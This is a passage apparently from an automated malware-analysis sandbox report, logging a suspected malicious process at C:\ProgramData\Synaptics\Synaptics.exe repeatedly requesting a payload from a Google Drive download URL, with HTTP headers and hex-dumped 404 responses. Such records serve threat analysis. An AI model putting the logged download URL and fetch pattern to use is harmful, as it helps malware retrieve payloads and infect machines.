                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-Ngr5LkPZ6-MeLKRC7hSewA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        42192.168.2.449853142.250.181.144437644C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-24 21:11:50 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
                                                                                        2024-12-24 21:11:51 UTC1314INHTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Tue, 24 Dec 2024 21:11:50 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-8W6IdiZoDH901mXvpUtmnA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        43192.168.2.449861142.250.181.144437644C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-24 21:11:54 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
                                                                                        2024-12-24 21:11:55 UTC1314INHTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Tue, 24 Dec 2024 21:11:54 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-tpLNCYFUeqHeteW-YAb-5A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        44192.168.2.449862142.250.181.144437644C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-24 21:11:54 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
                                                                                        2024-12-24 21:11:55 UTC1314INHTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Tue, 24 Dec 2024 21:11:54 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-OyV87gz-xl3MUg69EawJEw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        45192.168.2.449872142.250.181.144437644C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-24 21:11:58 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
                                                                                        2024-12-24 21:11:59 UTC1314INHTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Tue, 24 Dec 2024 21:11:58 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-JnO6tKM6w6S2qNn-JhVUoQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        46192.168.2.449873142.250.181.144437644C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-24 21:11:58 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
                                                                                        2024-12-24 21:11:59 UTC1314INHTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Tue, 24 Dec 2024 21:11:58 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-PwImKCe-5J7zOwmTHRMlFQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        47192.168.2.449877142.250.181.14437644C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-24 21:12:00 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Cache-Control: no-cache
                                                                                        Host: drive.usercontent.google.com
                                                                                        Connection: Keep-Alive
                                                                                        Cookie: NID=520=UI-98dUkItclliIk2WSXWLZte3xsvWEC6nPvd6glxakMl_ry_mQtvBoTYS_0iqUuYMFT4JdzcRj9TfcFKKD0ibVhP3-cxeYL9qZacytp0c9FK4TTI8dTwF_VVzRIT7_XUD--ljsfmhX5B02tj5rCyqFfLv9hwl7wdf0LpM1eWbF42tCzSDCSRZFR
                                                                                        2024-12-24 21:12:01 UTC1250INHTTP/1.1 404 Not Found
                                                                                        X-GUploader-UploadID: AFiumC4qrH-xw_kKokj_JvYjz4tY4wPvpIDZw-PBp_7e8RFOMgM1Y0A-Ovlong2yKWKWkmxhO30K8Xo
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Tue, 24 Dec 2024 21:12:01 GMT
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-DNAx6Nbu9OaUo_wjJxelhw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Content-Length: 1652
                                                                                        Server: UploadServer
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                        Connection: close
                                                                                        2024-12-24 21:12:01 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                        2024-12-24 21:12:01 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6b 38 70 30 67 70 73 6c 4b 37 6b 2d 4b 38 71 58 71 4c 34 66 37 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                        Data Ascii: 404 (Not Found)!!1</title><style nonce="k8p0gpslK7k-K8qXqL4f7w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                        2024-12-24 21:12:01 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                        Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        48192.168.2.449876142.250.181.144437644C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-24 21:12:00 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
                                                                                        2024-12-24 21:12:01 UTC1314INHTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Tue, 24 Dec 2024 21:12:01 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-IbFPBn3tCGUwJl-6ADBbTA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        49192.168.2.449879142.250.181.144437644C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-24 21:12:00 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
                                                                                        2024-12-24 21:12:01 UTC1314INHTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Tue, 24 Dec 2024 21:12:01 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-Z1ZFF8b6zAHIonudL-20Vw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        50192.168.2.449878142.250.181.14437644C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-24 21:12:00 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Cache-Control: no-cache
                                                                                        Host: drive.usercontent.google.com
                                                                                        Connection: Keep-Alive
                                                                                        Cookie: NID=520=UI-98dUkItclliIk2WSXWLZte3xsvWEC6nPvd6glxakMl_ry_mQtvBoTYS_0iqUuYMFT4JdzcRj9TfcFKKD0ibVhP3-cxeYL9qZacytp0c9FK4TTI8dTwF_VVzRIT7_XUD--ljsfmhX5B02tj5rCyqFfLv9hwl7wdf0LpM1eWbF42tCzSDCSRZFR
                                                                                        2024-12-24 21:12:01 UTC1243INHTTP/1.1 404 Not Found
                                                                                        X-GUploader-UploadID: AFiumC6UQSDGhHohRCXytTvF-Mj5uRR5EYLwwxcln5ZdePBCftb7WvbCfNx7Ti_bWAXk2LOk
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Tue, 24 Dec 2024 21:12:01 GMT
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-cn6I2J5nrc4Qkb5ID8ODUA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Content-Length: 1652
                                                                                        Server: UploadServer
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                        Connection: close
                                                                                        2024-12-24 21:12:01 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                        2024-12-24 21:12:01 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 33 36 71 52 55 2d 68 57 47 46 71 6a 6a 36 65 39 62 56 5a 69 59 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                        Data Ascii: t Found)!!1</title><style nonce="36qRU-hWGFqjj6e9bVZiYA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                        2024-12-24 21:12:01 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                        Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        51192.168.2.449889142.250.181.144437644C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-24 21:12:03 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
                                                                                        2024-12-24 21:12:04 UTC1314INHTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Tue, 24 Dec 2024 21:12:04 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-oBMgxByuLrSdk4AveNugSw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
